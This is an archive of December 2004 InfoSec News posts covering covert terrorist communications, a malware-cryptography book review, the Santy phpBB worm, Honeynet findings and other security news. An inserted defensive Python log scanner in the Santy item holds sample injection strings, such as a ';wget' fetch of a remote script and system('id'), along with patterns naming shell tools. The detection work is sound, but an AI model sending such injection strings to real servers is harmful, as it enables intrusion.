Caloyannides said. Lt. Col. Timothy L. Thomas, an analyst at the United States Army's Foreign Military Studies Office at Fort Leavenworth, Kan., wrote last year in the journal Parameters, the U.S. Army War College quarterly, that the threat of cyberplanning may be graver than the threat of terrorist attacks on the world's networks. "We used to talk about the intent of a tank," Colonel Thomas explained in an interview. "If you saw one, you knew what it was for. But the intent of electrons - to deliver a message, deliver a virus, or pass covert information - is much harder to figure." This has long frustrated intelligence analysts, according to James Bamford, an author and a specialist on the National Security Agency. "In the cold war days, you knew which communications circuits to watch," he said. "We knew that most of it was high-frequency anyway, so we had the place surrounded by high-frequency intercepts. Those frequencies weren't going anywhere, so you just sat there with the headphones on and listened." The problem now, Mr. Bamford said, is that the corridors for communication have become infinite and accessible to everyone. "You just don't sit and listen to a particular channel," he said. "It's all over the place. It's a 'needle in the haystack' problem that you have." Russ Rogers, a former Arab linguist with the National Security Agency and the Defense Information Systems Agency, said he feared security agencies might not realize how dense the haystack has become. "We've become a little bit arrogant," said Mr. Rogers, the author of a new book, "Hacking a Terror Network: The Silent Threat of Covert Channels," [1] which uses fictional situations to highlight the ways terrorists can communicate secretly online. "We feel like we created the Internet, that we've mastered the network," Mr. Rogers said. "But we're not paying attention to how it's being used to work against us." 
[1] http://www.amazon.com/exec/obidos/ASIN/1928994989/c4iorg From isn at c4i.org Wed Dec 22 03:23:59 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:53 2004 Subject: [ISN] REVIEW: "Malicious Cryptography", Adam L. Young/Moti Yung Message-ID: Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" BKMLCRPT.RVW 20041012 "Malicious Cryptography", Adam L. Young/Moti Yung, 2004, 0-7645-4975-8, U$45.00/C$64.99/UK#29.99 %A Adam L. Young %A Moti Yung %C 5353 Dundas Street West, 4th Floor, Etobicoke, ON M9B 6H8 %D 2004 %G 0-7645-4975-8 %I John Wiley & Sons, Inc. %O U$45.00/C$64.99/UK#29.99 416-236-4433 fax: 416-236-4448 %O http://www.amazon.com/exec/obidos/ASIN/0764549758/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0764549758/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0764549758/robsladesin03-20 %P 392 p. %T "Malicious Cryptography: Exposing Cryptovirology" Both the foreword and the introduction are turgid, and bloated with excessive verbiage, while never giving a clear indication of what the book is actually about. Does it have to do with viruses at all? Is it about the use of cryptography in any kind of criminal or unethical endeavour? The initial material does not make this clear. Occasionally the text becomes so flowery that sentences have no meaning at all. The lack of clarity is not assisted by the creation of new and idiosyncratic terms, or the use of existing jargon in non-standard ways. In chapter one, a fictional and glacially slow trip through the mind of a virus writer, we are told that self-checking modules that some programs use to detect modification in their own code are "beneficial Trojans" or "battleprogs." The term multipartite is defined in such a way that merely copying the program into RAM (Random Access Memory) qualifies: that would make every virus ever written, and every program, for that matter, multipartite. 
"Kleptogram" is used throughout the book, but only defined (and not very clearly) in the last chapter. Releasing any virus is seen as having something to do with "information warfare," which would agree with many sensationalistic journalists who have written on the subject, but would probably surprise legitimate experts such as Dorothy Denning. "Virology" itself (and the more specialized "cryptovirology") is an excellent term for computer virus research--it just isn't used very widely. There is a glossary: it defines commonly known terms and does not define the specialized jargon that the authors have used. The confusion is not limited to terminology. There is no technical sense to the statement (on page twenty five) that a certain layer of the network stack is "high enough to facilitate rapid software development" (compilers don't care where their software ends up) but low enough to escape detection (files, processes, and network packets are all visible). A disk locking program, as described, would have no effect on the operations of a remote access trojan. And, of course, our fictional protagonist is constantly creating new versions of the mythical "undetectable" virus, without there being any indication of how this might be done. (The fictional aspects of the book are not limited to chapter one. Throughout the work, examples are taken from fiction: it certainly feels like more illustrations come from works like "Shockwave Rider" and "Alien" than from real life.) Chapter two starts to get a bit better. The authors introduce the idea of using asymmetric cryptography in order to create a virus (or other piece of malware) that, rather than merely destroying data, provides for a reversible denial of access to data, and therefore the possibility of extortion. The idea is academically interesting, but there might be a few practical details to be worked out. 
Chapter three seems to move further into the academic realm, with an interesting overview of issues in regard to the generation of random, or pseudorandom, numbers. There is also an initial exploration of anonymity, with an insufficient description of "mix networks" (onion routing being one example). A little more discussion of anonymity starts off chapter four, which then moves on to another use of asymmetric cryptography in malware: the "deniable" recovery of stolen information, via distribution over public channels. Cryptocounters, which could be used to store generational or other information about the spread of a virus, without such data being accessible to virus researchers, are discussed in chapter five. Chapter six looks at aspects of searching for, and retrieving, information without disclosing the fact that an exploration is occurring. However, much of the material appears to be some highly abstract solutions rather desperately in search of problems. Varying the extortion scenario, chapter seven proposes a viral network that could retaliate for disinfection of any node by threatening disclosure of sensitive information. While the analysis of the structure of the attack is sound, the assumption of payoffs, coercion, and undetectability leave something to be desired. Chapter eight examines the standard antiviral processes (signature scanning, activity monitoring, and change detection) with some miscellaneous explorations, although the discussion is prejudiced by the assumption that we are dealing with traditional (and no longer widely used) file infectors. Trojan horse programs are not terribly well defined in chapter nine. (I was amused at the disclaimer given when the issue of "salami" scams was raised: I have found reliable evidence for only one, extremely minor, instance of the device.) Subliminal channels are means of passing information via cryptographic keys, but chapter ten is not very clear in regard to their use. 
SETUPs (Secretly Embedded Trapdoor with Universal Protection) are discussed in chapter eleven, although the authors appear to admit that this is only an academic exercise: there are easier attacks. Another form is discussed in chapter twelve. Does this book fulfill its function? That rather depends on what the intent of the work was, which is far from clear. Was the text intended to be a reference for some interesting topics in cryptography? The verbiage and lack of structure would be a difficulty for those seeking to use it so. Is the publication directed at the general public? The audience of those who read number theoretical manuscripts for fun might be a bit limited. (I've got to say that "Algebraic Aspects of Cryptography" [cf. BKALASCR.RVW] was an easier read, and it makes no pretence of being other than a scholastic paper.) Is the volume supposed to be a serious warning against new forms of malware? The inclusion of a great deal of extraneous content and the lack of clear explanations or examples of some basic concepts limit the value of the work in this regard. In addition, much of the material concentrates on building more malign malware, rather than dealing with defence against it. (I'm not too worried about vxers getting ideas from Young and Yung: implementing crypto properly is a painstaking task, and from almost twenty years experience of studying blackhat products and authors, I'm fairly sure there'd be lots of bugs in what might be released. On the other hand, somebody in a government office might be working on Magic Lantern version 3.01 ...) For those seriously involved in the study of viruses and malware this book has some interesting points that should be examined, but little of practical use. For ardent students of cryptography, the work notes some interesting areas of work. For those seeking examples of writing styles to emulate, please look elsewhere. copyright Robert M. 
Slade, 2004 BKMLCRPT.RVW 20041012 ====================== (quote inserted randomly by Pegasus Mailer) rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu I'm out of my mind, but feel free to leave a message. http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade From isn at c4i.org Thu Dec 23 04:13:07 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:18 2004 Subject: [ISN] Blood bank fears laptop heist ID theft Message-ID: Forwarded from: Eric Hacker One has to wonder how much more valuable that laptop is on the black market now that it is known to contain names and SSNs. We have ID counts and valuable configuration information being distributed in the news. Even if this was stolen by an addict, his fence probably keeps up with the news. On Wed, 22 Dec 2004 01:35:08 -0600 (CST), InfoSec News wrote: > http://news.com.com/Blood+bank+fears+laptop+heist+ID+theft/2100-1029_3-5500114.html [...] > Delta's director of human resources, John O'Neill, said two layers > of security could still protect the personal information despite the > computer's theft. The first is Microsoft's standard Windows password > required to launch the operating system, and the second is the > series of steps required to launch what O'Neill described as an > "esoteric, unique" database, created by a software provider he > declined to name. Now this spells out exactly what one needs to know in order to extract the information. Certainly makes putting a value on the laptop that much easier for someone who thinks they can get at the information inside. Now, I am not saying that this is a bad law. I think it has a lot of benefits for the consumer. What I am saying is that there are consequences to this law, especially the disclosure of details to the press by stressed out executives, that do not help protect the confidentiality of the stolen information. 
Obviously, one needs to have a personal information disclosure incident response plan in place before a disclosure occurs to prevent this issue. Obviously, an organization that well organized would probably be doing a better job of protecting the data in the first place.... Peace, Eric Hacker From isn at c4i.org Thu Dec 23 04:13:44 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:23 2004 Subject: [ISN] Linux lasting longer against Net attacks Message-ID: http://news.zdnet.com/2100-1009_22-5501278.html By Robert Lemos CNET News.com December 22, 2004 Unpatched Linux systems are surviving longer on the Internet before being compromised, according to a report from the Honeynet Project released this week. The data, from a dozen networks, showed that the average Linux system lasts three months before being compromised, a significant increase from the 72 hours life span of a Linux system in 2001. Unpatched Windows systems continue to be compromised more quickly, sometimes within minutes, the Honeynet Project report stated [1]. The results are probably due to two trends, said Lance Spitzner, president of Honeynet, which develops software for deploying computer systems as bait for online attackers. The default installations of new Linux systems are much more secure than previous versions of the open-source operating system, he said. Secondly, attackers seem to be much more concentrated on Windows systems than on Linux systems, and on attempting to fool desktop users, of which the vast majority use Windows. "Everybody is focused on Windows," Spitzner said. "There is more money (for an attacker) to be made on the Windows systems." The study is the latest data on the relative security of Linux systems versus Microsoft Windows. Last week, students found dozens of flaws in software that runs on Linux systems, and a research report stated that a thorough analysis of the Linux kernel turned up hundreds of flaws. 
However, in relative terms, those numbers are low compared to commercial applications. Honeynets, a term coined by the project, are networks of computers that are placed on the Internet with the expectation that they will be compromised by attackers. The networks are heavily monitored, and the data is used to research the latest tactics of online miscreants. While some of the Windows XP systems on the honeynets used for the latest study were compromised within minutes of being placed on the Internet, newer versions of the Linux operating system from Red Hat failed to be compromised by random attacks for more than two months. Debbie Fry Wilson, director of product management for the security response center at Microsoft, told CNET News.com that the company's latest operating system is more secure than the report suggests. "While it is not clear which version of Windows was used during the study, we feel that a Windows XP SP2 configuration with the Windows firewall enabled is the most resilient client operating system available in the market and can withstand attack much longer," Wilson said. "We are pleased that the report indicates that two Windows-based honeynets in Brazil withstood attack for several months. However, we are not certain that the report provides conclusive data based on a controlled and scientific study comparing the two operating systems." Every Windows system compromised during the study had its security breached by a worm. However, Spitzner stressed that the Honeynet Project does not have enough Windows systems deployed to offer meaningful data on that operating system's security. Moreover, the report does not specify what version of Windows XP had been running on the systems that had been compromised and whether any Service Pack upgrades had been installed. The study did find that more recent versions of the Linux operating system lasted longer on the Internet without patching. 
[1] http://www.honeynet.org/papers/index.html From isn at c4i.org Thu Dec 23 04:15:00 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:26 2004 Subject: [ISN] Google smacks down Santy worm Message-ID: http://www.nwfusion.com/news/2004/1222googlsmack.html By Paul Roberts IDG News Service 12/22/04 Web search engine company Google is blocking efforts by a new Internet worm to use its search engine to find vulnerable computers on the Internet, the company announced late Tuesday. Google is blocking searches launched by Santy.A, a new Internet worm that targets servers running phpBB, a popular electronic bulletin board software package, according to a statement from the company. Without any native ability to scan for vulnerable computers, Google's action halted Santy.A's spread, according to anti-virus companies. Santy.A targets servers running phpBB. Anti-virus companies first detected the worm Tuesday, though it may have been spreading silently well before that, according to Johannes Ullrich, chief technology officer at The SANS Institute's Internet Storm Center. The worm used a vulnerability in phpBB, an open source software product that is managed by the phpBB Group, to spread across the Internet, infecting computer servers that host online bulletin boards and defacing those sites with the words "This site is defaced!!! NeverEverNoSanity WebWorm." A phpBB component called viewtopic.php allows malicious commands to be passed to and executed on servers that run a vulnerable version of the phpBB software. Secunia, a Copenhagen-based security company, first reported the vulnerability on Nov. 19. An updated version of phpBB software that fixes the flaw was released on Nov. 18. Estimates of the impact of the Santy worm vary widely. Searches on a beta version of Microsoft's MSN Search feature for the text used to deface sites returned more than 30,000 hits. 
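Two ways of looking for Santy-style activity, as an added example (not code from the article, the phpBB Group or the Internet Storm Center): a scan of web-server access logs for viewtopic.php requests that carry command-injection indicators in a query value, beside the page-content check for the defacement string quoted in the article. The article says only that viewtopic.php passed attacker commands to the server, not which parameter or what the payload looked like, so the injection patterns, the parameter names and the log lines here are constructed and generic; a defacement search alone is also a poor census, since an infected board whose files could not be overwritten shows nothing on the page.

```python
"""Log-based and page-based indicators for a phpBB viewtopic.php command
injection worm. Added example; patterns, parameter names and log lines
are constructed assumptions, not a published Santy signature."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Defacement text quoted in the article.
DEFACEMENT_MARKER = "NeverEverNoSanity WebWorm"

# Assumed, generic indicators of a command being smuggled through a query value.
INJECTION_PATTERNS = [
    re.compile(r"[;|`]"),                                          # shell separators, backticks
    re.compile(r"\b(?:system|exec|passthru|shell_exec|eval)\s*\(", re.I),  # PHP execution calls
    re.compile(r"\b(?:wget|curl|perl|chmod)\b", re.I),              # typical drop-and-run tools
    re.compile(r"\$\(?[A-Za-z_]"),                                  # variable expansion
]

# Common log format: ip ident user [time] "method url proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def suspicious_query(url):
    """Return the first matched indicator in a viewtopic.php request's query
    values (after a second percent-decode to catch double encoding), or None
    for any other path or a clean query."""
    parts = urlsplit(url)
    if not parts.path.endswith("/viewtopic.php"):
        return None
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote(value)  # parse_qs already decoded once
            for pattern in INJECTION_PATTERNS:
                match = pattern.search(decoded)
                if match:
                    return match.group(0)
    return None


def scan_access_log(lines):
    """Return (client_ip, url, indicator) for each suspicious viewtopic.php
    request; lines that do not parse as common log format are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicator = suspicious_query(m.group("url"))
        if indicator:
            hits.append((m.group("ip"), m.group("url"), indicator))
    return hits


def is_defaced(html):
    """Page-content check. True only if the worm managed to overwrite files,
    so a False result does not mean the board is clean."""
    return DEFACEMENT_MARKER in html


# Constructed sample log: one normal topic view, two injection attempts.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Dec/2004:10:01:12 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5123',
    '198.51.100.9 - - [22/Dec/2004:10:02:40 +0000] '
    '"GET /forum/viewtopic.php?t=7&x=%3Bwget%20http%3A%2F%2F203.0.113.77%2Fs.pl HTTP/1.1" 200 311',
    '198.51.100.23 - - [22/Dec/2004:10:03:05 +0000] '
    '"GET /forum/viewtopic.php?t=3&x=system(%27id%27) HTTP/1.0" 200 290',
    'garbage line that is not a log record',
]

if __name__ == "__main__":
    for ip, url, indicator in scan_access_log(SAMPLE_LOG):
        print(f"{ip:15} {indicator!r:12} {url}")
```

Run it against a real phpBB access log by replacing SAMPLE_LOG with the file's lines; requests that match are worth pulling the corresponding response and process activity for, whether or not the board's front page shows the defacement text.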
However, identical searches on other engines, including the official MSN Search engine, Yahoo and Google search engines returned far fewer hits, ranging from 785 (MSN) to 2,030 (Yahoo). Using searches for telltale signs of infection, such as defacement text, is an inexact way to determine the actual number of Santy infections, said Ullrich. "Santy will only deface sites if it can overwrite files, and it may not always be able to do that based on the configuration of the Web server (running phpBB)," he said. Also, an analysis of the Santy code revealed that the worm spread quietly for a while, infecting phpBB servers but not overwriting files and defacing the bulletin boards, Ullrich said. The Santy worm marked some firsts, including the use of a popular search engine as part of a worm's spreading mechanism. But the lessons to be learned from Santy's spread are already well established: keep on top of software patches and "harden" the configuration of public-facing servers by preventing users from being able to take unnecessary actions, such as overwriting files, he said. From isn at c4i.org Thu Dec 23 04:15:25 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:32 2004 Subject: [ISN] Robbers' quandary: Getting rid of the cash Message-ID: http://news.bbc.co.uk/1/hi/business/4117961.stm By Gavin Stamp BBC News business reporter 22 December, 2004 Pulling off one of the largest and most daring cash robberies of all time is one thing. Disposing successfully of the loot and enjoying the benefits is another matter. For the criminals who have made off with more than ?20m from the headquarters of Northern Bank in Belfast, the problems may only just be beginning. Firstly, they will have to contend with the huge worldwide publicity that their heist has generated. 
'Massive headache'

Police in the United Kingdom and across Europe will be hot on their trail while shopkeepers from Ballymena to Brighton will be alert to any large or unusual purchases for the next few weeks.

Secondly, the sheer size of the robbers' hoard could turn out to be a millstone around their necks.

Getting rid of £20m without causing huge suspicion is likely to tax even the most resourceful and determined of criminal minds.

Not only do the stolen notes each have their own serial number, making them easy to identify, but the majority are denominated in Northern Ireland currency.

Although this is accepted throughout the United Kingdom, far fewer notes of this type tend to be in circulation outside Northern Ireland, making any effort to disperse them in England more risky.

"They have a massive headache," says John Horan, a money laundering expert with accountants Harbinson Mulholland. "To some extent, they have been the victims of their own success."

Furthermore, the laws governing reporting of suspicious money flows have been tightened up over the past two years, making it far harder for the criminals to discreetly invest their loot in a piece of real estate or an Old Master.

Suspicious minds

While banks have always had a legal responsibility to report suspicions of potential money laundering, the Proceeds of Crime Act passed in 2003 has extended this obligation to a whole raft of businesses and professionals.

"If they're thinking of buying property, that's a bad idea because property developers, estate agents and conveyancing lawyers are regulated and all have an obligation to report their suspicions," says Mr Horan.

"Thinking of buying a Matisse or a nice Rembrandt? That's a bad idea too because high value dealers such as auction houses are also regulated."

The robbers still have a number of options, money laundering experts agree, although they are limited.

If they plan to keep the money within the United Kingdom without resorting to burying it, setting up a front company is the most likely option.

"They can set up a fake company which can be used to nominally provide services and invoices for those services," says Trevor Mascarenhas, a partner at Phillipsohn Crawfords Berwald, a law firm specialising in fraud and money laundering.

"They can then take the cash and put it through the system, paying tax on what they purport to provide and try to legitimise the money."

Overseas options

To do this successfully, says Mr Horan, they would need the assistance of an expert money launderer who would expect to take a major cut of the proceeds.

More likely, however, is that the robbers will attempt to smuggle the money out of the United Kingdom in multiple consignments so as not to jeopardise the entire haul.

Drug laundering organisations in South America and Russian criminal gangs operating across Europe may provide a ready conduit for the money, channelling it through banks willing not to ask too many questions.

According to Ian Hopkins, a senior consultant with corporate investigators Carratu International, Colombia is one destination the robbers may consider.

"There are places like that which are not too concerned where the money comes from. There are banks which will take their 2% to 3% and deal with the rest of the money."

The money could even ultimately find its way back into the British economy through offshore businesses and accounts.

Whatever the fate of the money, most experts believe the robbers may have taken on more than they can chew.

"I would be very surprised if they expected to steal £20m," says Mr Hopkins. "It is like the Great Train Robbery. They are likely to be surprised and not a little panicked about how much they have got."
From isn at c4i.org Thu Dec 23 04:15:50 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 23 04:30:35 2004
Subject: [ISN] [infowarrior] - Opening for USAF Chief Scientist
Message-ID:

---------- Forwarded message ----------
Date: Wed, 22 Dec 2004 13:57:57 -0500
From: Richard Forno
To: Richard Forno
Subject: [infowarrior] - Opening for USAF Chief Scientist

From: Gene Spafford

Season's Greetings, everyone!

Please share this with your colleagues, and repost to mailing lists where you think it will be seen by appropriate candidates.

I am passing on information about a position where a person with the right qualifications can make a big difference in computing R&D, including issues of cybersecurity, data collection/fusion, HCI, communications, real-time operating systems, pattern recognition, reliable computing, and a host of other areas.

The Air Force Laboratory, Information Directorate, has an opening for its chief scientist. The URL for the official announcement is .

I am enclosing a portion of the job description and qualifications, below; see the official announcement for full details. The short form of the job description starts off "Serves as the Air Force principal scientific and primary authority for the technical content of the S&T portfolio related to information systems and science for the advancement and application of information systems science and technology...." (The position is limited to US citizens and nationals by its nature.)

I have been involved with the folks in AFRL/IF for several years now. They have some outstanding researchers and facilities, including a great new building and lab space, and they are working on really important (and difficult!) problems that have impacts on national defense, law enforcement, university research and the private sector.

The main facility is located in Rome, NY. This is a beautiful area of the country (especially if you enjoy a few months of real winter with skiing, skating, and snowball fights :-) with affordable housing and relaxed surroundings. The position pays well, and is a senior appointment.

The job duties description includes the following:

The Information Directorate conducts USAF research, exploratory and advanced development activities in knowledge based technologies, computer science and technology, collaborative environments, signal processing, information fusion and exploitation, command & control decision support, aerospace connectivity, networking, information management and cyber operations. The Chief Scientist provides scientific leadership, advice and guidance throughout the Laboratory on research plans and programs in core area and related technologies. The Chief Scientist serves to focus research and development efforts associated with the interrelated group of technologies and strengthen the in-house activities of the laboratory. Conceives, plans, and advocates major research and development activities; consults with the laboratory director, the laboratory chief scientist and the technology director and staff concerning the total research program and results; monitors and guides the quality of scientific and technical resources; and provides expert technical consultation to other AFRL directorates, DOD agencies, universities and industry.

Position requires an internationally recognized authority in information systems science and technology with the ability to conceive and conduct advanced research and development. The incumbent must make significant contributions to the advancement of knowledge in the field as evidenced by numerous important scientific publications and by citation of the work by others.
Qualifications include the following:

The candidate must have at least three years of specialized experience within the broad area of information systems science and technology as applied to areas such as: battlespace awareness, dynamic planning and execution, and global information enterprise, with specific research experience in areas that support these broad topics such as information fusion and exploitation, predictive battlespace awareness, information assurance, cyber operations, communications & networks, effects based operations, collaborative enterprises, modeling and simulation, intelligent agents, machine reasoning, information management, or intelligent information systems. At least one year of this research experience must demonstrate that the candidate has leadership experience in planning and executing difficult research activities resulting in outstanding attainments in information systems science and technology; or planning and executing specialized programs of national significance in exploratory and advanced development of information systems science and technology.

From isn at c4i.org Fri Dec 24 03:14:45 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:33:51 2004
Subject: [ISN] Inside Security Administrator UPDATE--December 23, 2004
Message-ID:

=======================

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security Administrator UPDATE.

Debunking the Top 5 Myths of Outsourcing Email Security
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsB0Ai

Free Patch Management White Paper from St. Bernard Software
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsC0Aj

=======================

1. What's New in the Latest Issue
January 2005 Issue
- Focus: Security Toolkit and Training
- Feature: The Auditor Security Collection

2. New Additions to the Online Article Archive
January 2004 Issue
- Focus: Document Security
- Features
- Access Denied

==== Sponsor: Debunking the Top 5 Myths of Outsourcing Email Security ====

As spam and email-borne viruses continue to threaten the productivity and stability of email systems, enterprises are evaluating various anti-spam email security solutions including buying software or appliances for deployment in-house, or outsourcing email security to a managed service. In this free White paper, you'll find out the five most common myths surrounding the concept of outsourcing email security. Plus, you'll gain an understanding of the benefits gained from using a managed service for email security including improved protection against new email threats and attacks, lower infrastructure costs, less administrative burden, and reduced risk and complexity. Get this white paper now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsB0Ai

=======================

Security Administrator is a monthly, paid, print newsletter loaded with news and tips to help you manage, optimize, and secure your Web-enabled enterprise. Nonsubscribers can access all the newsletter content in the online article archive from the premiere issue of Security Administrator (February 2001) through the print issue released 1 year ago and featured below.

In addition to receiving the monthly print newsletter, subscribers can access all the newsletter content, including the most recent issue, at the Security Administrator Web site.
http://www.windowsitpro.com/windowssecurity

Subscribe today and access all the issues online!
https://secure.pentontech.com/nt/security/index.cfm?promocode=00wi25xxhm

=======================

==== 1. What's New in the Latest Issue ====

January 2005 Issue

Focus: Security Toolkit and Training

The Auditor collection of security tools can be a great start to a security toolkit, and Port Reporter is another good addition to your tool set. Security certifications can be good for you--if you pick the right ones to pursue.

The following article is available at no charge to nonsubscribers for a limited time:

Feature
The Auditor Security Collection
Use this Linux-based, self-contained tool collection as an easy-to-use, all-in-one security toolkit.
--Jeff Fellinge
http://www.windowsitpro.com/windowssecurity/article/articleid/44648/44648.html

Subscribers have access to the entire contents of the January 2005 issue. For a list of the other articles available in this issue, visit the URL below.
http://www.windowsitpro.com/windowssecurity/issues/issueid/750/index.html

=======================

==== Sponsor: Free Patch Management White Paper from St. Bernard Software ====

Successful patch management is a core component of maintaining a secure computing environment. With a growing number of patches being released by Microsoft weekly, IT administrators must be vigilant in assuring that the machines on their networks are accurately patched. Although Microsoft offers tools to assist administrators with the tasks of patching, they are often time-consuming and far from comprehensive. However, there are solutions on the market that can reliably and accurately automate the tasks involved in successful patch management. In this free white paper, learn more about the patch management dilemma and patch management solutions. Download this free white paper now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsC0Aj

==== Announcements ====
(from Windows IT Pro and its partners)

Are You "Getting By" Using Fax Machines or Relying on a Less Savvy Solution That Doesn't Offer Truly Integrated Faxing from Within User Applications?
Attend this free on-demand Web seminar and learn what questions to ask when selecting an integrated fax solution, discover how an integrated fax solution is more efficient than traditional faxing methods, and learn how to select the fax technology that's right for your organization. Register now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhA0AW

Harness the Power of Active Directory Provisioning
Join Active Directory expert Jeremy Moskowitz for this on-demand Web seminar. Discover the power of using Group Policy to efficiently configure and manage computers within your company to reduce administration and maximize productivity. You'll learn how to leverage Group Policy to provision desktops, manage the provisioning process, and more. Register now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhB0AX

Best Practices for Systems Management
In this free on-demand Web seminar, you'll discover the most effective practices to monitor and manage your OSs and how they can be put into practice in your environment. Our expert panel will deliver the tips and techniques you need to improve service levels and maximize the use of your IT staff. Register now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhC0AY

Get the Entire Exchange 2003 eBook
This free eBook will educate Exchange administrators and systems managers on how to best approach the migration and overall management of an Exchange Server 2003 environment. The book will focus on core issues such as configuration management, accounting, and monitoring performance with an eye toward migration, consolidation, security, and management. Get the entire eBook now!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhD0AZ

=======================

==== 2. New Additions to the Online Article Archive ====

January 2004 Issue

To access this issue of Security Administrator, go to the following URL:
http://www.windowsitpro.com/windowssecurity/issues/issueid/682/Index.html

Focus: Document Security

Set up Windows Rights Management Services to protect your documents, email messages, and Web site content. Also, learn about the Ethereal packet sniffer and certificate autoenrollment.

Features

The Ethereal Packet Sniffer
Learn how to use this free, full-featured protocol analyzer, which has both graphical and command-line interfaces.
--Jason Fossen
http://www.windowsitpro.com/windowssecurity/article/articleid/40949/40949.html

Windows Rights Management Services
Microsoft's new Windows Rights Management Services (RMS) lets users lock down documents, email messages, and Web content like never before.
--John Howie
http://www.windowsitpro.com/windowssecurity/article/articleid/40951/40951.html

Windows Server 2003 PKI Certificate Autoenrollment
Windows Server 2003 lets you automatically enroll users and computers for certificates, including smart card-based certificates.
--Jan De Clercq
http://www.windowsitpro.com/windowssecurity/article/articleid/40948/40948.html

Access Denied

Making MBSA Ignore Patches to Disabled Services
Prevent updates for disabled services and features from generating false positives on MBSA reports.
--Randy Franklin Smith
http://www.windowsitpro.com/windowssecurity/article/articleid/40946/40946.html

Scanning for Office Updates
MBSA can't scan for missing Office updates, but you can use one of two other options to do the job.
--Randy Franklin Smith
http://www.windowsitpro.com/windowssecurity/article/articleid/40947/40947.html

=======================

==== Events Central ====
(brought to you by Windows IT Pro)

Stop the "Silent Killer" Unleashed by Spammers
You're under attack from the "silent killer" trying to steal your email directory addresses through directory harvest attacks. Symptoms include sudden bursts of email activity that last only a few minutes and server deferral queues that are constantly full, slowing your server performance. Register now for this free on-demand Web seminar and learn how to stop the "silent killer" in its tracks!
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhE0Aa

==== Sponsored Link ====

Data Protection from NSI and Microsoft
Instant recovery and data protection solutions for Exchange and SQL servers
http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNdw0AM

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://www.windowsitpro.com/forums
About product news -- products@windowsitpro.com
About your subscription -- securityupdate@windowsitpro.com
About sponsoring UPDATE -- emedia_opps@windowsitpro.com

=======================

This email newsletter is brought to you by Security Administrator, the leading publication for IT professionals securing the Windows enterprise from external intruders and internal users. Subscribe today!
( http://www.secadministrator.com/rd.cfm?code=00ep254xebb )

View the Windows IT Pro Privacy policy at
http://www.windowsitpro.com/aboutus/index.cfm?action=privacy

Windows IT Pro is a division of Penton Media Inc.
221 East 29th Street, Loveland, CO 80538, Attention: Customer Service Department
Copyright 2004, Penton Media, Inc. All Rights Reserved.

From isn at c4i.org Fri Dec 24 03:15:01 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:33:53 2004
Subject: [ISN] Final Call for Papers & Workshops - BCS Asia 2005
Message-ID:

Forwarded from: Anthony Zboralski

Dear ISN Readers,

Final Call for Papers & Workshops - BCS Asia 2005

I just wanted to remind you that this is your last chance to send your proposal to cfp2005@bellua.com (abstract must be sent today; presentation slides can be sent later.)

The Call for Workshops has been extended until the 1st January 2005.
Please read the detailed CFP, (we cover hotel accommodation, travel expenses and honorarium.) http://www.bellua.com/bcs2005/asia05.cfp.html 21-22 March 2005: Workshops 23-24 March 2005: Conference 21st - 24th March the largest information security conference in Asia will take place in Jakarta, Indonesia at the Hotel Borobudur. Between 400 to 600 delegates and visitors are expected. Merry Christmas and Happy New Year 2005! Anthony -- Anthony C. Zboralski PT Bellua Asia Pacific - http://www.bellua.com Bumi Daya Plaza 18th Floor, jl. Iman Bonjol No.61 Jakarta 10310 Indonesia. Phone: +62213918330 HP:+628159102495 65b1d8c7 - 6c0b b76a 51ef bfa6 c03b 97c8 af75 420c 65b1 d8c7 From isn at c4i.org Fri Dec 24 03:16:30 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:33:56 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-52 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-12-16 - 2004-12-23 This week : 131 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Two vulnerabilities have been reported in Konqueror, which can be exploited by malicious people to compromise 
